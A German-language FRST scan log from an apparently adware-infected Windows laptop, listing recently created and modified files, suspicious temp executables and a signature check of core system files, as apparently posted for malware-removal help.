2016-01-31 20:19 - 2012-08-10 09:40 - 02213776 _____ (ELAN Microelectronics Corp.) C:\WINDOWS\ETDUninst.dll
2016-01-31 19:53 - 2016-01-31 19:53 - 00000000 ____D C:\Program Files\{05EB6F99-463B-44CA-93A7-7C57786E2569}
2016-01-31 19:53 - 2016-01-31 19:53 - 00000000 ____D C:\Program Files (x86)\{81124F8F-D6AB-4912-9F8D-54DC4E6DDE56}
2016-01-31 19:01 - 2016-01-31 19:01 - 00000117 _____ C:\WINDOWS\system32\netcfg-13944156.txt
2016-01-31 19:01 - 2016-01-31 19:01 - 00000117 _____ C:\WINDOWS\system32\netcfg-13941265.txt
2016-01-31 18:50 - 2016-01-31 18:50 - 00000117 _____ C:\WINDOWS\system32\netcfg-13267328.txt
2016-01-31 18:50 - 2016-01-31 18:50 - 00000117 _____ C:\WINDOWS\system32\netcfg-13251421.txt
2016-01-31 15:05 - 2016-01-31 15:05 - 00000092 _____ C:\WINDOWS\system32\netcfg-16197750.txt
2016-01-31 14:52 - 2016-02-06 16:37 - 00003236 _____ C:\WINDOWS\System32\Tasks\IBUpd2
2016-01-31 14:50 - 2016-01-31 14:50 - 00000000 ____D C:\ProgramData\Brother
2016-01-31 14:49 - 2016-02-06 16:37 - 00000000 ____D C:\Users\Manz\AppData\Local\BrowserAir
2016-01-31 14:48 - 2016-01-31 21:40 - 00000000 ____D C:\Users\Manz\AppData\Roaming\dlg
2016-01-31 14:43 - 2016-01-31 14:43 - 00000117 _____ C:\WINDOWS\system32\netcfg-14853765.txt
2016-01-31 14:41 - 2016-02-06 16:49 - 00000000 ____D C:\Program Files (x86)\MPC Cleaner
2016-01-31 14:40 - 2016-02-06 18:49 - 00023208 _____ (Corporation) C:\WINDOWS\system32\Drivers\sdfhgdf.sys
2016-01-31 14:40 - 2016-02-06 16:33 - 00003398 _____ C:\WINDOWS\System32\Tasks\RSPro
2016-01-31 14:40 - 2016-02-06 16:33 - 00000000 ____D C:\Users\Manz\AppData\Local\SearchModule
2016-01-31 14:38 - 2016-01-31 14:38 - 00000117 _____ C:\WINDOWS\system32\netcfg-14536734.txt
2016-01-31 14:38 - 2016-01-31 14:38 - 00000117 _____ C:\WINDOWS\system32\netcfg-14533984.txt
2016-01-31 14:38 - 2016-01-31 14:38 - 00000000 ____D C:\ProgramData\b66d00b7-58c3-0
2016-01-31 14:38 - 2016-01-31 14:38 - 00000000 ____D C:\ProgramData\b66d00b7-3853-1
2016-01-31 14:36 - 2016-01-31 14:36 - 00000117 _____ C:\WINDOWS\system32\netcfg-14466015.txt
2016-01-31 14:35 - 2016-01-31 19:07 - 00000000 ____D C:\Program Files (x86)\Super Great
2016-01-31 14:35 - 2016-01-31 14:35 - 00003116 _____ C:\WINDOWS\System32\Tasks\Builder Touch2
2016-01-31 14:35 - 2016-01-31 14:35 - 00000117 _____ C:\WINDOWS\system32\netcfg-14391046.txt
2016-01-31 14:34 - 2016-02-01 19:20 - 00000000 ____D C:\Users\Manz\AppData\Roaming\systweak
2016-01-31 14:34 - 2016-01-31 14:35 - 00000117 _____ C:\WINDOWS\system32\netcfg-14348812.txt
2016-01-31 14:34 - 2016-01-31 14:35 - 00000000 ____D C:\ProgramData\2WdM2
2016-01-31 14:34 - 2016-01-31 14:34 - 00003128 _____ C:\WINDOWS\System32\Tasks\Builder Touch
2016-01-31 14:34 - 2016-01-31 14:34 - 00001139 _____ C:\WINDOWS\system32\netcfg-14346250.txt
2016-01-31 14:34 - 2016-01-31 14:34 - 00000000 ____D C:\Users\Manz\AppData\Local\Builder Touch
2016-01-31 14:34 - 2015-11-20 19:27 - 00019888 _____ () C:\WINDOWS\system32\roboot64.exe
2016-01-31 14:33 - 2016-01-31 19:04 - 00000000 ____D C:\Users\Manz\AppData\Roaming\yoursearching
2016-01-31 14:32 - 2016-01-31 14:32 - 00000000 ____D C:\Users\Manz\AppData\Local\rec_en_77
2016-01-31 14:32 - 2016-01-31 14:32 - 00000000 ____D C:\Program Files (x86)\rec_en_77
2016-01-31 14:30 - 2016-01-31 20:54 - 00000000 ____D C:\Program Files (x86)\SearchesToYesbnd
2016-01-31 14:30 - 2016-01-31 14:30 - 00000000 ____D C:\Users\Manz\AppData\Local\F727A298-4DB4-456A-AC54-A93EA5F8554D
2016-01-31 14:30 - 2016-01-31 14:30 - 00000000 ____D C:\Users\Manz\AppData\Local\3810282D-6C19-47B0-8283-5C6C29A7E108
2016-01-31 14:30 - 2016-01-31 14:30 - 00000000 ____D C:\Program Files (x86)\B5B53C54-1454247040-E111-8F5D-B888E3A0B275
2016-01-31 14:29 - 2016-01-31 14:30 - 00000000 ____D C:\Users\Public\Documents\dmp
2016-01-31 14:26 - 2016-01-31 21:37 - 00000000 ____D C:\Program Files (x86)\SFK
2016-01-31 14:26 - 2016-01-31 14:34 - 00000074 _____ C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
2016-01-31 14:26 - 2016-01-31 14:27 - 00000000 ____D C:\ProgramData\DWdMD
2016-01-31 14:25 - 2016-02-01 19:22 - 00000000 ____D C:\Users\Manz\AppData\Roaming\istartpageing
2016-01-31 14:22 - 2016-02-06 18:44 - 00000000 ____D C:\Users\Manz\AppData\Local\gmsd_de_005010223
2016-01-31 14:22 - 2016-02-06 16:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GAMESDESKTOP
2016-01-31 14:22 - 2016-01-31 14:22 - 00000000 ____D C:\Program Files (x86)\gmsd_de_005010223
2016-01-31 14:20 - 2016-02-06 16:33 - 00000592 _____ C:\task.vbs
2016-01-31 14:19 - 2016-01-31 14:24 - 01080312 _____ (Mozilla) C:\Users\Manz\Downloads\Thunderbird Setup 38.5.1(1).exe.part
2016-01-31 14:18 - 2016-02-06 18:45 - 00005120 _____ C:\WINDOWS\SysWOW64\mgc100enu.dll
2016-01-31 14:18 - 2016-01-31 20:45 - 00000000 ____D C:\Program Files (x86)\QuickSearch
2016-01-31 14:16 - 2016-02-06 16:32 - 00000008 _____ C:\END
2016-01-31 14:16 - 2016-02-06 16:32 - 00000000 ____D C:\Program Files\SpaceSoundPro
2016-01-31 14:16 - 2016-01-31 20:02 - 00000000 ____D C:\Program Files (x86)\SpaceSondPro_v53.12571
2016-01-31 14:16 - 2016-01-31 14:16 - 00000000 ____D C:\Program Files (x86)\SpaceSondPro
2016-01-31 14:13 - 2016-02-01 19:17 - 00000000 ____D C:\ProgramData\Avg
2016-01-31 14:12 - 2016-01-31 14:12 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_WpdFs_01_11_00.Wdf
2016-01-31 14:09 - 2016-02-06 18:45 - 00000306 __RSH C:\ProgramData\ntuser.pol
2016-01-31 14:09 - 2016-01-31 14:18 - 33940552 _____ (Mozilla) C:\Users\Manz\Downloads\Thunderbird Setup 38.5.1.exe
2016-01-31 14:08 - 2016-02-01 19:00 - 00000000 ____D C:\Users\Manz\AppData\Local\AvgSetupLog
2016-01-31 14:08 - 2016-01-31 21:39 - 00000000 ____D C:\Users\Manz\AppData\Local\Avg
2016-01-31 14:07 - 2016-01-31 14:09 - 00151072 _____ C:\WINDOWS\system32\DnsBlockUpdateSvc.exe
2016-01-31 14:07 - 2016-01-31 14:07 - 00471968 _____ C:\WINDOWS\SysWOW64\dns.block
2016-01-31 14:07 - 2016-01-31 14:07 - 00471968 _____ C:\WINDOWS\system32\dns.block
2016-01-31 14:07 - 2016-01-31 14:07 - 00000000 ____D C:\Users\Manz\AppData\Local\DnsBlock
2016-01-31 14:06 - 2016-02-06 18:48 - 00000000 ____D C:\Users\Manz\AppData\Local\B5B53C54-1454249191-E111-8F5D-B888E3A0B275
2016-01-31 14:06 - 2016-01-31 14:03 - 00000967 _____ C:\WINDOWS\system32\Drivers\etc\hp.bak
2016-01-31 14:04 - 2016-02-06 16:33 - 00001834 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2016-01-31 14:04 - 2016-01-31 20:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-01-31 14:04 - 2016-01-31 20:02 - 00000000 ____D C:\Program Files (x86)\B5B53C54-1454245483-E111-8F5D-B888E3A0B275
2016-01-31 14:04 - 2016-01-31 14:11 - 00000000 ____D C:\Users\Manz\AppData\Local\Mozilla
2016-01-31 14:04 - 2016-01-31 14:05 - 00000000 ____D C:\Users\Manz\AppData\Roaming\Mozilla
2016-01-31 14:03 - 2016-01-31 14:03 - 00023214 _____ C:\WINDOWS\System32\Tasks\{0D0B7D47-0F7D-040B-7811-090D050F117E}
2016-01-31 14:03 - 2016-01-31 14:03 - 00000000 ____D C:\ProgramData\8da658ec-7697-0
2016-01-31 14:03 - 2016-01-31 14:03 - 00000000 ____D C:\ProgramData\8da658ec-0995-1
2016-01-31 14:00 - 2016-01-31 14:00 - 00003440 _____ C:\WINDOWS\System32\Tasks\Genius_Interval
2016-01-31 14:00 - 2016-01-31 14:00 - 00003090 _____ C:\WINDOWS\System32\Tasks\Genius
2016-01-31 14:00 - 2016-01-31 14:00 - 00000000 ____D C:\Users\Manz\AppData\Roaming\Genius
2016-01-31 14:00 - 2016-01-31 14:00 - 00000000 ____D C:\Users\Manz\AppData\Local\ext_funfeedr
2016-01-31 13:59 - 2016-01-31 18:49 - 00002912 _____ C:\WINDOWS\SysWOW64\LavasoftTcpServiceOff.ini
2016-01-31 13:59 - 2016-01-31 18:49 - 00002912 _____ C:\WINDOWS\system32\LavasoftTcpServiceOff.ini
2016-01-31 13:59 - 2016-01-31 13:59 - 00425744 _____ (Lavasoft Limited) C:\WINDOWS\system32\LavasoftTcpService64.dll
2016-01-31 13:59 - 2016-01-31 13:59 - 00345360 _____ (Lavasoft Limited) C:\WINDOWS\SysWOW64\LavasoftTcpService.dll
2016-01-31 13:59 - 2016-01-31 13:59 - 00000000 ____D C:\Program Files (x86)\Lavasoft
2016-01-31 13:57 - 2016-01-31 13:57 - 00000000 ____D C:\Users\Manz\AppData\Local\clear.fi
2016-01-31 13:57 - 2016-01-31 13:57 - 00000000 ____D C:\ProgramData\Lavasoft
2016-01-31 13:54 - 2016-01-31 20:37 - 00000000 ____D C:\Users\Manz\AppData\Roaming\WildTangent
2016-01-31 13:50 - 2016-01-31 13:50 - 01132240 _____ (Software Assistant) C:\Users\Manz\Downloads\firefox_download (1).exe
2016-01-31 13:46 - 2016-01-31 13:46 - 01137872 _____ (Software Assistant) C:\Users\Manz\Downloads\firefox_download.exe
2016-01-31 13:44 - 2016-01-31 13:44 - 00000000 ____D C:\Users\Manz\AppData\Local\EgisTec IPS
2016-01-31 13:43 - 2016-02-06 18:49 - 00003596 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2229505580-413648313-3343944023-1002
2016-01-31 13:40 - 2014-05-20 03:33 - 00059416 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2016-01-31 13:40 - 2014-05-20 00:45 - 00629248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2016-01-31 13:40 - 2014-05-20 00:45 - 00086528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll
2016-01-31 13:40 - 2014-05-20 00:24 - 03286528 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-01-31 13:40 - 2014-05-20 00:24 - 01623040 _____ (Microsoft Corporation) C:\WINDOWS\system32\wucltux.dll
2016-01-31 13:40 - 2014-05-20 00:24 - 00773632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2016-01-31 13:40 - 2014-05-20 00:24 - 00253440 _____ (Microsoft Corporation) C:\WINDOWS\system32\WUSettingsProvider.dll
2016-01-31 13:40 - 2014-05-20 00:24 - 00176640 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2016-01-31 13:40 - 2014-05-20 00:24 - 00100352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
2016-01-31 13:40 - 2014-05-14 23:43 - 00144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuwebv.dll
2016-01-31 13:40 - 2014-05-14 23:43 - 00040448 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapp.exe
2016-01-31 13:40 - 2014-05-14 23:42 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuwebv.dll
2016-01-31 13:40 - 2014-05-14 23:42 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapp.exe
2016-01-31 13:40 - 2013-08-16 06:21 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
2016-01-31 13:40 - 2013-08-16 06:21 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
2016-01-31 13:40 - 2013-08-15 23:43 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wups.dll
2016-01-31 13:40 - 2012-11-06 05:20 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaext.dll
2016-01-31 13:40 - 2012-11-06 05:00 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\wushareduxresources.dll
2016-01-31 13:38 - 2016-01-31 13:38 - 00000000 ____D C:\Users\Manz\AppData\Roaming\Macromedia
2016-01-31 13:36 - 2016-02-06 16:33 - 00001624 _____ C:\Users\Manz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2016-01-31 13:36 - 2016-01-31 13:36 - 00000000 ____D C:\Users\Manz\AppData\Roaming\Atheros
2016-01-31 13:36 - 2016-01-31 13:36 - 00000000 ____D C:\Users\Manz\AppData\Roaming\Adobe
2016-01-31 13:36 - 2016-01-31 13:36 - 00000000 ____D C:\Program Files\Preload
2016-01-31 13:36 - 2016-01-31 13:36 - 00000000 ____D C:\Program Files\Accessory Store
2016-01-31 13:35 - 2016-01-31 13:35 - 00000000 ____D C:\Users\Manz\AppData\Local\VirtualStore
2016-01-31 13:34 - 2016-01-31 13:36 - 00000000 ____D C:\Users\Manz\AppData\Local\Packages
2016-01-31 13:34 - 2016-01-31 13:34 - 00000117 _____ C:\WINDOWS\system32\netcfg-10714812.txt
2016-01-31 13:34 - 2016-01-31 13:34 - 00000117 _____ C:\WINDOWS\system32\netcfg-10714468.txt
2016-01-31 13:34 - 2016-01-31 13:34 - 00000020 ___SH C:\Users\Manz\ntuser.ini
2016-01-31 12:06 - 2016-01-31 12:06 - 00000117 _____ C:\WINDOWS\system32\netcfg-5452000.txt
2016-01-31 12:06 - 2016-01-31 12:06 - 00000117 _____ C:\WINDOWS\system32\netcfg-5449984.txt
2016-01-31 11:54 - 2016-01-31 11:54 - 00000117 _____ C:\WINDOWS\system32\netcfg-4734765.txt
2016-01-31 11:54 - 2016-01-31 11:54 - 00000117 _____ C:\WINDOWS\system32\netcfg-4734703.txt
2016-01-31 10:38 - 2016-01-31 10:38 - 00000117 _____ C:\WINDOWS\system32\netcfg-177156.txt
2016-01-31 10:38 - 2016-01-31 10:38 - 00000117 _____ C:\WINDOWS\system32\netcfg-176171.txt
2016-01-31 10:38 - 2016-01-31 10:38 - 00000117 _____ C:\WINDOWS\system32\netcfg-173796.txt
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\Vorlagen
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\Startmenü
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\Netzwerkumgebung
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\Lokale Einstellungen
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\Eigene Dateien
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\Druckumgebung
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\Documents\Eigene Videos
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\Documents\Eigene Musik
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\Documents\Eigene Bilder
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\AppData\Local\Verlauf
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\AppData\Local\Anwendungsdaten
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\Anwendungsdaten
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\ProgramData\Vorlagen
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\ProgramData\Startmenü
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\ProgramData\Microsoft\Windows\Start Menu\Programme
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\ProgramData\Dokumente
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\ProgramData\Anwendungsdaten
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Program Files\Gemeinsame Dateien
2016-01-31 10:37 - 2016-01-31 20:08 - 00000000 ____D C:\Users\Manz
2016-01-31 10:37 - 2016-01-31 10:38 - 00024768 _____ C:\WINDOWS\diagwrn.xml
2016-01-31 10:37 - 2016-01-31 10:38 - 00024768 _____ C:\WINDOWS\diagerr.xml
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\Vorlagen
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\Startmenü
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\Netzwerkumgebung
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\Lokale Einstellungen
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\Eigene Dateien
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\Druckumgebung
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\Documents\Eigene Videos
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\Documents\Eigene Musik
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\Documents\Eigene Bilder
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\AppData\Local\Verlauf
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\AppData\Local\Anwendungsdaten
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\Anwendungsdaten
2016-01-31 10:36 - 2016-01-31 10:36 - 00000117 _____ C:\WINDOWS\system32\netcfg-73703.txt
2016-01-31 10:35 - 2016-01-31 10:35 - 00000000 ____D C:\Windows.old
2016-01-31 10:34 - 2016-01-31 10:34 - 00262144 _____ C:\WINDOWS\system32\config\userdiff
2016-01-31 10:10 - 2016-01-31 10:10 - 00000000 ____D C:\$WINDOWS.~BT
2016-01-31 10:07 - 2016-01-31 10:09 - 00000000 ___HD C:\$SysReset
2016-01-20 14:27 - 2016-01-20 14:27 - 00001379 _____ C:\Users\Manz\Downloads\URLLink(16).acsm
2016-01-18 17:14 - 2016-01-18 17:14 - 00012193 _____ C:\Users\Manz\Documents\Entschuldigungsschreiben (Sport).odt
2016-01-18 17:00 - 2016-01-18 17:00 - 00021980 _____ C:\Users\Manz\Documents\Entschuldigungsschreiben Sport..pdf
2016-01-18 16:58 - 2016-01-18 16:58 - 00021979 _____ C:\Users\Manz\Documents\Entschuldigungsschreiben Sport.pdf
2016-01-18 16:44 - 2016-01-18 16:48 - 00022587 _____ C:\Users\Manz\Documents\ANGST IST ZUM ÜBERWINDEN DA..odt
2016-01-18 15:53 - 2016-01-18 15:54 - 00020797 _____ C:\Users\Manz\Documents\NICHT JEDER KANN IN ALLEM GUT SEIN.odt
2016-01-10 15:44 - 2016-01-10 15:44 - 00001503 _____ C:\Users\Manz\Downloads\URLLink(15).acsm

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-02-06 18:51 - 2012-08-03 03:29 - 00001792 _____ C:\Users\Public\Desktop\McAfee Internet Security Suite.lnk
2016-02-06 18:50 - 2012-07-26 08:59 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-02-06 18:47 - 2012-09-11 22:36 - 00753134 _____ C:\WINDOWS\system32\perfh007.dat
2016-02-06 18:47 - 2012-09-11 22:36 - 00155826 _____ C:\WINDOWS\system32\perfc007.dat
2016-02-06 18:47 - 2012-07-26 08:28 - 01745416 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-02-06 18:47 - 2012-07-26 06:37 - 00000000 ____D C:\WINDOWS\Inf
2016-02-06 18:45 - 2012-08-03 03:28 - 00000000 ____D C:\Program Files (x86)\McAfee
2016-02-06 18:43 - 2012-07-26 08:22 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-02-06 16:40 - 2012-07-26 06:26 - 00262144 ___SH C:\WINDOWS\system32\config\BBI
2016-02-01 19:49 - 2012-07-26 06:26 - 00262144 ___SH C:\WINDOWS\system32\config\ELAM
2016-02-01 19:30 - 2012-09-11 13:25 - 00001024 ___RH C:\Users\Public\Documents\NTIMMV9Acer.dll
2016-02-01 19:30 - 2012-08-03 03:28 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2016-01-31 21:37 - 2012-07-26 09:12 - 00000000 ____D C:\WINDOWS\SysWOW64\GroupPolicy
2016-01-31 21:34 - 2012-09-11 12:52 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2016-01-31 21:00 - 2012-09-11 13:08 - 00000000 ____D C:\Program Files (x86)\Qualcomm Atheros
2016-01-31 20:46 - 2012-09-11 12:56 - 00000000 ___HD C:\Program Files (x86)\Temp
2016-01-31 20:37 - 2012-08-03 03:26 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2016-01-31 20:37 - 2012-08-03 03:26 - 00000000 ____D C:\ProgramData\WildTangent
2016-01-31 20:34 - 2012-08-03 03:29 - 00000000 ____D C:\Program Files (x86)\Acer
2016-01-31 20:32 - 2012-08-03 03:29 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer
2016-01-31 20:07 - 2012-08-03 03:22 - 00000000 ____D C:\Users\Administrator
2016-01-31 20:06 - 2012-07-26 09:12 - 00000000 ____D C:\WINDOWS\WinStore
2016-01-31 20:06 - 2012-07-26 09:12 - 00000000 ____D C:\WINDOWS\SysWOW64\WinMetadata
2016-01-31 20:06 - 2012-07-26 09:12 - 00000000 ____D C:\WINDOWS\Cursors
2016-01-31 20:06 - 2012-07-26 09:12 - 00000000 ____D C:\Program Files\Windows Defender
2016-01-31 20:04 - 2012-07-26 09:12 - 00000000 ___HD C:\WINDOWS\system32\GroupPolicy
2016-01-31 20:01 - 2012-07-26 09:12 - 00000000 ____D C:\WINDOWS\registration
2016-01-31 20:01 - 2012-07-26 06:38 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2016-01-31 20:01 - 2012-07-26 06:37 - 00000000 ____D C:\WINDOWS\servicing
2016-01-31 20:00 - 2012-09-11 13:26 - 00000000 ____D C:\ProgramData\Norton
2016-01-31 20:00 - 2012-09-11 13:03 - 00000000 ____D C:\Program Files (x86)\Bluetooth Suite
2016-01-31 20:00 - 2012-08-03 03:30 - 00000000 ____D C:\ProgramData\Temp
2016-01-31 20:00 - 2012-07-26 09:12 - 00000000 ____D C:\Program Files\Windows Photo Viewer
2016-01-31 20:00 - 2012-07-26 09:12 - 00000000 ____D C:\Program Files\Common Files\System
2016-01-31 20:00 - 2012-07-26 09:12 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2016-01-31 20:00 - 2012-07-26 08:52 - 00000000 ____D C:\Program Files\Windows Journal
2016-01-31 18:56 - 2012-08-03 03:28 - 00000000 ____D C:\ProgramData\McAfee
2016-01-31 15:10 - 2012-07-26 08:19 - 00281248 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-01-31 14:21 - 2012-09-11 13:26 - 00000000 ____D C:\ProgramData\NortonInstaller
2016-01-31 14:21 - 2012-09-11 12:57 - 00000000 ____D C:\Dolby PCEE4
2016-01-31 13:37 - 2012-08-03 04:18 - 00000000 ___HD C:\OEM
2016-01-31 13:36 - 2012-09-11 13:23 - 00000000 ____D C:\ProgramData\OEM
2016-01-31 13:34 - 2012-07-26 09:12 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2016-01-31 11:55 - 2012-08-03 04:21 - 00000000 ___DC C:\WINDOWS\Panther
2016-01-31 10:38 - 2012-07-26 09:12 - 00000000 __RHD C:\Users\Public\Libraries
2016-01-31 10:38 - 2012-07-26 09:12 - 00000000 ____D C:\Program Files\Windows NT
2016-01-31 10:36 - 2012-07-26 09:12 - 00000000 ____D C:\WINDOWS\tracing
2016-01-31 10:35 - 2012-07-26 09:13 - 00262144 _____ C:\WINDOWS\system32\config\BCD-Template
2016-01-20 14:30 - 2014-06-24 18:44 - 00000000 ____D C:\Users\Manz\Documents\My Digital Editions

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2016-02-01 19:37 - 2016-02-06 16:37 - 0000099 _____ () C:\Users\Manz\AppData\Roaming\WB.CFG
2012-09-11 12:57 - 2012-09-11 12:57 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2016-01-31 14:26 - 2016-01-31 14:34 - 0000074 _____ () C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat

Dateien, die verschoben oder gelöscht werden sollten:
====================
C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
C:\Users\Manz\setup.exe


Einige Dateien in TEMP:
====================
C:\Users\Manz\AppData\Local\Temp\113C.tmp.exe
C:\Users\Manz\AppData\Local\Temp\1CAC.tmp.exe
C:\Users\Manz\AppData\Local\Temp\2E52.tmp.exe
C:\Users\Manz\AppData\Local\Temp\2EA8.tmp.exe
C:\Users\Manz\AppData\Local\Temp\3D62.tmp.exe
C:\Users\Manz\AppData\Local\Temp\4156.tmp.exe
C:\Users\Manz\AppData\Local\Temp\42AC.tmp.exe
C:\Users\Manz\AppData\Local\Temp\6731.tmp.exe
C:\Users\Manz\AppData\Local\Temp\6B14.tmp.exe
C:\Users\Manz\AppData\Local\Temp\7671.tmp.exe
C:\Users\Manz\AppData\Local\Temp\8819.tmp.exe
C:\Users\Manz\AppData\Local\Temp\AcerCloudDocsSetup.exe
C:\Users\Manz\AppData\Local\Temp\amisetup3427__17454.exe
C:\Users\Manz\AppData\Local\Temp\amisetup4281__17454.exe
C:\Users\Manz\AppData\Local\Temp\amisetup7063__17454.exe
C:\Users\Manz\AppData\Local\Temp\apptemp.1.exe
C:\Users\Manz\AppData\Local\Temp\AskSLib.dll
C:\Users\Manz\AppData\Local\Temp\BUFVLDZZ5C.exe
C:\Users\Manz\AppData\Local\Temp\C3A.tmp.exe
C:\Users\Manz\AppData\Local\Temp\C4ED.tmp.exe
C:\Users\Manz\AppData\Local\Temp\C558.tmp.exe
C:\Users\Manz\AppData\Local\Temp\CD51.tmp.exe
C:\Users\Manz\AppData\Local\Temp\E9CC.tmp.exe
C:\Users\Manz\AppData\Local\Temp\FGYPQQUV1U.exe
C:\Users\Manz\AppData\Local\Temp\fsd25BB.exe
C:\Users\Manz\AppData\Local\Temp\fsd4424.exe
C:\Users\Manz\AppData\Local\Temp\ICReinstall_1CAC.tmp.exe
C:\Users\Manz\AppData\Local\Temp\oprun30695.exe
C:\Users\Manz\AppData\Local\Temp\setup.tmp.exe
C:\Users\Manz\AppData\Local\Temp\ShammedFourposter.dll
C:\Users\Manz\AppData\Local\Temp\Uninstall.exe


==================== Bamital & volsnap =================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll
[2012-07-26 01:09] - [2012-07-26 01:09] - 0604672 ____A (Microsoft Corporation) 2371BB2CFE1FDFB87426FDD8E71F1E65

C:\WINDOWS\SysWOW64\dnsapi.dll
[2012-07-26 01:11] - [2012-07-26 01:11] - 0461312 ____A (Microsoft Corporation) 0F96350F9D1A583F921B3666348F2DE1

C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert

Addition (Versuch 1):

Code:

ATTFilter

